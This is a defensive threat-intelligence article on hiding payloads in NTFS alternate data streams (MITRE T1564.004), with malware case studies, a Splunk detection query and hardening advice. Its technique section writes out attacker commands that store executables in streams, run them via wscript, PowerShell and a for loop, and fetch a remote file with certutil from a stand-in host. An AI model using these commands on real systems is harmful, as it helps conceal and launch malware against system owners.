T1564.004: NTFS Alternate Data Streams

T1564.004 is a sub-technique of T1564 (Hide Artifacts) under the Defense Evasion tactic. It exploits a design feature of NTFS that was originally introduced to provide compatibility with Apple's Hierarchical File System (HFS), which used resource forks to store file metadata alongside file content. In Windows, every NTFS file has at least one data stream — the default unnamed stream — that holds the file's visible contents. Alternate data streams (ADS) are additional named data attributes attached to the same file, accessible via the colon syntax: filename.txt:streamname. Any data can be stored in an ADS, including complete executables and scripts, without affecting the file's reported size or timestamp in standard views.

The evasion value is significant. A security analyst examining a directory listing, a file system inventory, or a standard antivirus scan result will see only the host file. The ADS content does not appear. File Explorer does not show it. The dir command does not show it by default. Even the file's size reported to the operating system reflects only the default stream. An adversary can stage an entire malware payload attached to a legitimate system file — desktop.ini, a known Windows configuration file, is a documented real-world choice — and that payload is effectively invisible to any tool that does not specifically enumerate alternate streams.

How NTFS Alternate Data Streams Work

Creating an ADS from the command line requires only write access to the target file and directory. The syntax is straightforward:

# Write malicious content to an ADS on a benign host file
# The visible file legitimate.txt remains unchanged in size
type malicious.exe > legitimate.txt:payload.exe

# Verify the host file size — only the default stream is counted
dir legitimate.txt
# File shows its original size, with no indication of the attached stream

# Enumerate all alternate streams in a directory
dir /r
# Or with PowerShell:
Get-Item legitimate.txt -Stream *

Executing a payload stored in an ADS can be accomplished through several LOLBin (Living Off the Land Binary) pathways that make the command line activity appear more legitimate:

# Execute ADS payload via wscript
wscript.exe legitimate.txt:payload.js

# Execute via PowerShell Invoke-Expression reading from stream
$s = Get-Content legitimate.txt -Stream payload.ps1
Invoke-Expression $s

# Execute via certutil to decode and run
certutil -urlcache -split -f http://host/file legitimate.txt
# (ADS can also be written using certutil's decode functionality)

# Classic command prompt execution from an ADS
for /f "usebackq delims=?" %i in (legitimate.txt:payload.bat) do @%i

Beyond payload storage, ADS have several secondary uses in attacker tradecraft. Data exfiltration staging: collected credential files or sensitive data can be assembled into an ADS attached to a common file, reducing the file count visible to monitoring tools. Persistence via scheduled tasks: the stream path can be referenced directly in a scheduled task or registry run key, pointing to an executable hidden inside an ADS. Configuration storage: some malware families use ADS to store encrypted configuration data or C2 addresses alongside a dropper component, making the configuration harder to extract during incident response.

One legitimate ADS that defenders should be familiar with is :Zone.Identifier — the Mark of the Web (MotW) stream that Windows attaches to files downloaded from the internet, signalling to applications that the file came from an untrusted source. Adversaries sometimes deliberately strip this stream (or deliver content through methods that prevent it from being created) to prevent SmartScreen and macro policy checks from triggering. Detecting its absence on files that should carry it is itself a detection signal.

Real-World Case Studies

Astaroth: ADS as a Core Living-Off-the-Land Component

Astaroth is a Brazilian banking trojan that has targeted users across Latin America, North America, and Europe since 2017. A significant evolution documented by Microsoft in early 2020 introduced ADS abuse as a central element of the malware's attack chain. Astaroth hid binary payload data inside the ADS of desktop.ini — a legitimate Windows configuration file present in many directories — without altering the file's visible size. Multiple stages of the infection chain used this ADS to store and retrieve components: the malware injected into legitimate Windows processes including userinit.exe and colorcpl.exe, and at several points wrote and read from the hidden stream to avoid creating standalone malicious files that endpoint security products could detect. This approach combined with the exclusive use of legitimate LOLBins — wmic.exe, bitsadmin.exe, extexport.exe, regsvr32.exe — meant no traditionally malicious executable ever appeared in standard file listings during the entire infection chain.

BitPaymer / Indrik Spider: ADS for Ransomware Self-Persistence

BitPaymer, the ransomware operated by Indrik Spider (the group also responsible for Dridex and its evolution into Evil Corp), was first observed ransoming the UK's National Health Service in 2017 and continued targeted big-game hunting operations through subsequent years. BitPaymer was documented implementing a specific ADS self-check: when executing, the malware verified whether it was already running from an alternate data stream. If not, it created an ADS on an arbitrary host file, copied itself into that stream, and relaunched from the stream path before deleting the original executable. The result was a ransomware binary that, after initial execution, existed only as an ADS with no standalone file counterpart — making it significantly harder to locate and remove through standard incident response file hunting procedures.

Anchor Malware: ADS Staging in TrickBot Operations

Anchor is a modular backdoor developed by the TrickBot group and deployed in high-value targeted intrusions, typically against financial institutions and critical infrastructure operators. Analysis by Cybereason documented Anchor using ADS to store components and configuration data during its installation phase. The malware used the esentutl.exe LOLBin — a legitimate Windows Extensible Storage Engine utility — to read from and write to alternate data streams as part of its staging process, keeping malicious components hidden while establishing persistence through scheduled tasks that referenced ADS paths. The use of a legitimate Windows database tool to interact with streams provided an additional layer of defence evasion beyond the ADS hiding itself.

Detection Strategies

Detection for T1564.004 requires telemetry sources that most default Windows configurations do not enable. The critical control is Sysmon Event ID 15, which logs file stream creation events — without it, ADS creation is largely invisible to SIEM-based detection.

Splunk — ADS Creation and Execution Events

# Detect ADS creation via Sysmon Event ID 15 (FileCreateStreamHash)
# and process execution referencing ADS paths
index=wineventlog (EventCode=15 OR EventCode=1)
| eval event_type=case(
    EventCode=15, "stream_created",
    EventCode=1 AND match(CommandLine,":[^\\\\]+$"), "stream_executed",
    true(), "other"
  )
| where event_type != "other"
| where NOT match(TargetFilename,"(?i):Zone\.Identifier$")
  AND NOT match(TargetFilename,"(?i):SmartScreen$")
| eval risk=case(
    match(CommandLine,"(?i)(wscript|cscript|powershell|certutil|regsvr32|mshta).*:"),
    "high",
    event_type="stream_created", "medium",
    true(), "low"
  )
| stats count by Computer, User, Image, CommandLine, TargetFilename, event_type, risk
| where risk IN ("high","medium")
| sort - risk

Behavioral Indicators

Indicator	What It Means
Sysmon Event ID 15 for a stream name other than :Zone.Identifier or :SmartScreen	Non-system ADS creation; legitimate software rarely creates custom named streams — any unexpected stream name on a non-system file warrants investigation
Process execution where the command line contains a colon-delimited path (e.g. file.txt:payload.exe)	Direct ADS execution; a process being launched from a stream path is highly anomalous and has no common legitimate use case in standard enterprise environments
LOLBins (wscript.exe, certutil.exe, esentutl.exe, regsvr32.exe) with command-line arguments referencing a colon stream path	ADS payload execution via living-off-the-land binary; the combination of a trusted Windows process with a stream path argument is a documented pattern across Astaroth, Anchor, and other malware families
Downloaded or received file missing the :Zone.Identifier ADS that should normally be present	MotW stripping — file was delivered through a method that avoids MotW attachment (ISO, VHD, container format) or had the stream explicitly deleted; relevant for detecting bypass of macro policy and SmartScreen
dir /r or Streams.exe output revealing streams on common system files like desktop.ini	Consistent with Astaroth's documented ADS hiding location; system configuration files should not have custom streams — their presence indicates staging activity

Known Threat Actors Using T1564.004

ADS abuse spans nation-state espionage tooling and commodity cybercrime equally. The following represent consistently documented users across both categories.

• Indrik Spider / Evil Corp (cybercriminal, Russia-linked) — BitPaymer ransomware uses ADS for self-copying and execution to erase the standalone binary after initial run; the group subsequently developed WastedLocker and Hades with similar evasion approaches
• TrickBot / Wizard Spider (cybercriminal) — Anchor backdoor uses ADS for component staging and esentutl.exe for stream interaction during targeted financial institution and critical infrastructure intrusions
• OceanLotus / APT32 (Vietnam-nexus) — Operation Cobalt Kitty documented use of ADS as part of a multi-stage infection chain in targeted corporate espionage against Asian conglomerates
• Astaroth operators (cybercriminal, Brazil-based) — Systematic multi-stage ADS abuse hiding binary payloads inside desktop.ini streams across campaigns targeting banking credentials in Brazil, Europe, and North America
• LATRODECTUS (cybercriminal, IcedID successor) — Documented in a May 2024 Elastic analysis as using ADS during its installation and persistence phases; assessed as a potential replacement for IcedID as an initial access broker tool
• Regin platform (nation-state, attributed to Five Eyes) — Used NTFS extended attributes and alternate streams for long-term covert storage of components across highly targeted espionage operations against GSM network operators

Defensive Recommendations

1. Deploy Sysmon with FileCreateStreamHash logging enabled: Sysmon Event ID 15 is the primary telemetry source for ADS detection. Deploy Sysmon with a configuration that captures stream creation events across all non-system directories, excluding known legitimate streams (:Zone.Identifier, :SmartScreen, :{SomeGUID} thumbnail cache entries). This is the foundational control — without it, reliable detection of T1564.004 is not achievable through log analysis alone.
2. Alert on process execution from ADS paths: Build SIEM detection rules for Sysmon Event ID 1 (Process Create) where the command line or image path contains the colon stream syntax. Any process launched from an ADS path is anomalous in standard enterprise environments and should be treated as high-priority. Extend this to cover LOLBins — wscript.exe, cscript.exe, mshta.exe, certutil.exe, regsvr32.exe, esentutl.exe — invoked with stream-path arguments.
3. Conduct periodic ADS enumeration during threat hunting: Deploy Streams.exe (Microsoft Sysinternals) or use dir /r in hunting scripts to enumerate all non-standard ADS on sensitive directories including %TEMP%, %APPDATA%, %PUBLIC%, user profile directories, and system configuration file locations. Any stream named outside the expected set of Windows-created streams warrants analysis.
4. Monitor for MotW absence on downloaded files: Alerting on the absence of :Zone.Identifier streams on files received via email or browser download requires EDR or Sysmon integration. Files that should carry MotW but do not — particularly Office documents and executables — may have been delivered through container formats designed to strip it, which is closely related to ADS manipulation as a defence evasion category.
5. Apply application control policies that restrict execution from non-standard paths: Windows Defender Application Control (WDAC) and AppLocker can be configured to block execution of files whose paths reference stream syntax, preventing ADS payloads from executing directly even if they are present on disk. Rules blocking execution from %TEMP% and user-writable directories should be combined with stream-path restrictions for layered coverage.
6. Include ADS enumeration in incident response procedures: Standard IR runbooks for Windows hosts should include automated ADS enumeration as part of the initial triage phase. Many IR toolkits and EDR platforms now support stream enumeration natively; where they do not, Streams.exe should be included in the response toolkit and executed early in the investigation before potential cleanup activity removes stream data.

MITRE ATT&CK Mapping

Field	Value
Technique ID	T1564.004
Technique Name	Hide Artifacts: NTFS File Attributes
Parent Technique	T1564 Hide Artifacts
Tactic	Defense Evasion (TA0005)
Platforms	Windows
Data Sources	Command: Command Execution; File: File Metadata; File: File Modification; Process: Process Creation
Mitigations	M1022 Restrict File and Directory Permissions (limited applicability)
Version	1.2 (Last Modified: October 24, 2025)
MITRE Reference	attack.mitre.org/techniques/T1564/004

Frequently Asked Questions

What is T1564.004 NTFS Alternate Data Streams?

T1564.004 is a MITRE ATT&CK sub-technique under Defense Evasion in which adversaries exploit NTFS alternate data streams — a feature of the Windows NTFS file system that allows multiple data streams to be attached to a single file — to store malicious payloads, binaries, or scripts in locations not visible to standard directory listings, File Explorer, or security tools that do not inspect alternate stream data.

How do adversaries use NTFS alternate data streams?

Adversaries write malicious executables, scripts, or encoded payloads into the alternate data stream of an existing benign file using the colon syntax — for example, writing to legitimate.txt:hidden.exe. The host file size does not change and the stream content is invisible to dir, File Explorer, and many antivirus tools. The payload can then be executed by referencing the full stream path, or extracted and loaded into memory via LOLBins like wscript.exe, powershell.exe, or certutil.exe.

How can organizations detect NTFS alternate data stream abuse?

Detection relies on enabling Sysmon Event ID 15 (FileCreateStreamHash), which logs file stream creation events including the stream name and hash. SIEM rules should alert on process execution where the command line contains the colon stream syntax, file creation events where the stream name does not match expected system streams such as :Zone.Identifier, and execution of LOLBins with stream-path arguments. The Streams.exe Sysinternals tool and dir /r can enumerate alternate streams on demand during threat hunting.

Sources and References

• MITRE ATT&CK — T1564.004 Hide Artifacts: NTFS File Attributes: attack.mitre.org
• Microsoft Security Blog — Latest Astaroth living-off-the-land attacks are even more invisible but not less observable: microsoft.com
• CrowdStrike — Big Game Hunting: The Evolution of INDRIK SPIDER from Dridex Wire Fraud to BitPaymer Targeted Ransomware: crowdstrike.com
• Cybereason — Dropping Anchor: From a TrickBot Infection to the Discovery of the Anchor Malware: cybereason.com
• Elastic Security — Spring Cleaning with LATRODECTUS (Stepanic & Bousseaden, May 2024): elastic.co
• SANS ISC — Alternate Data Streams: Adversary Defense Evasion and Detection: isc.sans.edu